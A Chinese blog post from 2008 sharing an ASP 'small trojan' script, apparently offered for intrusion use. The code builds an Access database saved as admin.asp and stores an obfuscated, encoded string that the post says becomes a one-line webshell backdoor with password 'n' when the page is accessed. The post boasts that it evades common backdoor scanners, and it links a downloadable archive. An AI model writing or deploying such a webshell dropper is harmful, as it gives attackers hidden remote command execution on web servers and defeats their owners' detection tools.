ASP入侵代码写的写不错的小马一般工具查不出来

by 清泉 19. 八月 2008 11:22

<%
'code by netpatch
dim dbfile,sql
db="admin.asp"
dbfile=server.mappath(db)

set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if

set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile

sql="create table fdata([data] memo)"
conn.execute(sql)

set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"
rs.update

%>
可以躲过ASP木马自带的后门扫描器,被访问则在同目录释放出密码为"n"的一句话后门
ASP入侵代码写的写不错的小马一般工具查不出来.rar (545.00 bytes)

Tags: ,

ASP技术资料 | 安全相关

添加评论



(将显示你的Gravatar头像)  

biuquote
微笑得意调皮害羞酷大笑惊讶发呆喜欢可怜尴尬闭嘴噘嘴皱眉伤心抓狂呕吐坏笑漫骂发怒
Loading



Supidea.com 晨飞的梦 @ All Rights Reserved. Powered by BlogYi.NET ver:1.8.0.0. 苏ICP备09011404号

关于博主

kamau
抱着美好的理想背井离乡,这酸甜苦辣只能默默忍受。既然选择了路,就得风雨兼程……

Calendar

<<  九月 2010  >>
303112345
6789101112
13141516171819
20212223242526
27282930123
45678910

在日历中查看文章

最近的评论

Comment RSS

声明

      本博所发一切破解相关附件只作学习研究交流之用,严禁用于商业用途,请在下载24小时内删除。
      本博所有网友评论不代表本博立场,版权归其作者所有。

© Copyright 2009